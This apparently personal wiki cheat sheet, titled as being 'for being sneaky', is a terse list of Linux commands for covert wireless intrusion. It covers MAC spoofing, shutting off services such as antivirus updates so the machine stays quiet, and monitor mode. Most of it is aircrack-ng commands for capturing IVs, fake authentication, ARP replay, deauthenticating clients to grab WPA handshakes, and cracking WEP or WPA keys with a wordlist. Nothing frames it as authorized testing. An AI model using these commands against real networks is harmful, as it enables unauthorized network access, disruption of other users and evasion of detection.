Linux Network Config (for being sneaky)
From TheBeard Science Project Wiki
exit #TO PREVENT EXECUTION OF THIS FILE ifconfig wlan0 down ifconfig wlan0 hw ether 00:11:22:33:44:55 ifconfig wlan0 up macchanger -A wlan0 - set random vendor MAC -a - another random vendor MAC -r - random MAC -p - reset to original MAC -m xx:xx:xx:xx:xx:xx - set MAC -l - list known vendors -s - show current MAC daemons to shut off: smbd nmbd clamav-freshclam network-manager unattended-upgrades (packet sniff to find out if anything else is generating traffic from you machine) promiscuous mode: ifconfig wlan0 promisc remove: ifconfig wlan0 -promisc monitor mode: ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up ifconfig wlan0 192.168.1.1 netmask 255.255.255.0 this does not always work, for instance with a wireless card using ndiswrapper you need to change your .conf file withing your driver's folder located in /etc/ndiswrapper/ which reportedly works, you simply change the line mac_address|XX:XX:XX:XX:XX:XX to mac_address| I do not currently have that working on gentoo linux at the moment however it's worked for a couple people out there and it -is- the method listed for the wiki. simply bringing the wlan0 down and ifconfig wlan0 hw ether does not work with my gentoo build using ndiswrapper it seems to be overwritten w/ the real mac address repeatedly. /etc/sysconfig/network-scripts/ifcfg - interface configurations service network restart - self explanitory service networking restart - self explanitory dhcpcd wlan0 - set wlan0 to dhcp dhclient -4 -s 11.22.33.44 wlan0 - set interface to dhcp (ip4) from dhcp server 11.22.33.44 ################ WEP/WPA ################### SPOOF spoof wlan0 and mon0 INTERFACE airmon-ng start wlan0 - creates new interface called mon0 that can monitor and inject airmon-ng stop mon0 - removes mon0 MONITOR airodump-ng mon0 - monitors all channels channels 1 -14 used for 802.11b & g. channels 36-149 used for 802.11a. MB = speed. 11 is 802.11b and 54 is 802.11g PACKETS every packet contains initialization vector (IV). # of IVs captured are under #Data. PTW cracking:00:17:3F:BD:4F:E2 64 bit - capture 10k IVs. 128 bit - capture 500k IVs. FMS/Korek cracking: 64 bit - capture 250k IVs. 128 bit - capture 1.5m IVs. TEST INJECTION aireplay-ng -9 -e ssid -a 00:00:00:00:00:00 mon0 -9 - test -e essid name -a AP address ATTACK/INJECTION TEST aireplay-ng -9 mon0 -i wlan1 - mimics an AP to produce different results CAPTURE airodump-ng -c 11 -d 00:00:00:00:00:00 -w dump mon0 -d - bssid of target listens to channel 11 on access point with bssid and dumps in file called "dump". channel is optional. PRODUCE IVs (FAKE AUTHENTICATION) aireplay-ng -1 0 -e ssid -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0 produces a lot of arp requests and traffic. Noticable. -1 - fake authentication (delay = 0) -a - bssid -h - your mac address if doesn't work, try -1 6000 -o 1 -q10 also put it in a loop (about 2.5 sec) may also produce handshake PRODUCE TRAFFIC while running airodump-ng... aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0 -b - bssid of AP -h - your mac address if packets stop flowing, reduce the replay speed wih -x <packets/sec>. default 50. also, try generating ARP by pinging non existant ip address. DISCONNECT PACKET FOR WPA HANDSHAKE while running airodump-ng... aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0 -0 - deauth (followed by number of deauths to send) -a bssid of AP -c host to disconnect CRACKING aircrack-ng -b 00:00:00:00:00:00 dump*.cap -b bssid of AP (optional if capture was from only one AP) capture file (put * to use all capture files) -n - 64 or 128 bit key -K alternative parameter (FMS/Korek method) default method is PTW FOR WPA/WPA2 run aircrack-ng with "-w word.lst" to brute force using a dictionary called word.lst. aircrack-ng comes with a default list located in /usr/share/doc/aircrack-ng/examples/password.lst.gz. CHANNEL if having trouble with interface being in a fixed channel: ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up
